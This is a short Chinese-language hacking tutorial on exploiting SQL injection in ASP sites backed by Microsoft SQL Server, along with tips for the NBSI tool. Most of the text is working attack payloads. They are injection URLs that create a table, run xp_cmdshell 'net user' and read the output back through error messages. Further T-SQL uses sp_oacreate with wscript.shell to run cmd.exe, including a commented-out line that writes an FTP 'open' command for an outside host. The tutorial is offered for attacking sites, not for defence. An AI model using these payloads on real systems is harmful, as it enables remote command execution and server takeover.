作者:Alpha
1.显示cmd执行的回显.
在注入是sa权限时,看不到命令的回显时件很痛苦的事情,在小竹兄的nbsi里也有一个尝试回显,可为什么要尝试了?呵呵
下面我说一种方法,绝对对可看到回显,不知道小竹兄用的是什么方法哦
建立表
语句:http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000));--
返回:正常的信息!说明建表成功!继续!
语句:http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell net user ;--
返回:正常信息。应该写入dirs数据正常
语句:http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs);--
返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07
将 varchar 值 ***转换为数据类型为 int 的列时发生语法错误。
^_^,这样我们就看到回显的结果了,当然,直接用nbsi暴表里的内容将更快速.
同理 ,其它的扩展也可以用这种方法得到内容哦,比如regread,(没有测试)
2. xp_dirtree写路径的问题
nbsi的目录列表工具不是很好用,有时候显示列不出来,实际上是出来了的哦,你直接暴表的数据(默认是NB_TreeList_Tmp)就看到内容了.
3.检测漏洞存在
nbsi的漏洞检测功能实在不敢恭维,对于写的像数字型的字符他都拒绝检测,就更不用说过滤了引号的类型了,所以还是建议手工检测,这样保证万无一失(:P)
4.删除xpsql70.dll和xp_cmdshell,and无法上传的问题解决
实际上很早以前czy大哥已经说过了,记得lzy好像也说过一个,不过和这个好像不一样
declare @s int
exec sp_oacreate "wscript.shell",@s out
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open asp.7i24.com>c:a.txt"
这个是在查询分析器里执行的,直接在地址栏里应该也是可以执行的,像这样
declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo aaa >c:a.txt"
具体的没有在注入点测试
转载著名作者:Alpha谢谢